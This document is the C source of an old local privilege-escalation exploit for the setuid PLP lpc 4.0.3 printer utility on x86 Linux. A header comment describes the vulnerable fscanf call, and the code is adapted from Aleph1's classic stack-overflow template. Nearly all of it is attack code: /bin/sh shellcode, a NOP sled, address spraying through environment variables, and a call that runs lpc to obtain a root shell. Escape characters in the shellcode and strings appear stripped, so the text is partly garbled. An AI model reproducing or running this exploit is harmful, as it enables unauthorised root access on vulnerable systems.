| Code |
/*
Standard overflow for x86 linux lpc. PLP Line Printer Control program, version 4.0.3. Tested on SuSE 5.2 (suidroot). Test your copy of /usr/bin/lpc by trying an /usr/bin/lpc attach lp `perl -e "print 'A' x 1000"`;lpc status lp The problematic code is in displayq.c and control_ops.c, where we attempt to fscanf() the lockfile's contents into a fixed length buffer. See the Bugtraq post for full fix information(www.geek-girl.com/bugtraq).
The buffer we're overflowing is 256bytes, and an offset of 0 works just fine. Try in increments of +-100 if it doesn't work for you.
Obviously this is a complete rip of Aleph1's standard overflow program from his paper "smashing the stack for fun and profit".
to compile: gcc -o xnec_lpc xnec_lpc.c
bugs: only sets uid=0, and you may have to have a printer defined (lp on my box).
greets to #sk1llz
-xnec xnec on EF and DALnet, xnec@inferno.tusculum.edu
*/ #include <stdlib.h>
#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 356
#define DEFAULT_EGG_SIZE 2048
#define NOP 0x90
char pause;
char shellcode[] =
"xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b"
"x89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcd"
"x80xe8xdcxffxffxff/bin/sh";
unsigned long get_esp(void) {
__asm__("movl %esp,%eax");
}
void main(int argc, char *argv[]) {
char *buff, *ptr, *egg;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int i, eggsize=DEFAULT_EGG_SIZE;
if (argc > 1) bsize = atoi(argv[1]);
if (argc > 2) offset = atoi(argv[2]);
if (argc > 3) eggsize = atoi(argv[3]);
if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.
");
exit(0);
}
if (!(egg = malloc(eggsize))) {
printf("Can't allocate memory.
");
exit(0);
}
addr = get_esp() - offset;
printf("Using address: 0x%x
", addr);
printf("
PLP Line Printer Control program, version 4.0.3 overflow.
");
printf("Bug found by xnec, code ripped from Aleph1. After running this program, simply compile and run:
---
#include <unistd.h>
void main(){system("/bin/bash");}
---
");
scanf("%c", pause);
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;
ptr = egg;
for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
*(ptr++) = NOP;
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buff[bsize - 1] = '�';
egg[eggsize - 1] = '�';
memcpy(egg,"EGG=",4);
putenv(egg);
memcpy(buff,"RET=",4);
putenv(buff);
system("`which lpc` attach lp $RET; `which lpc` status lp");
}
|
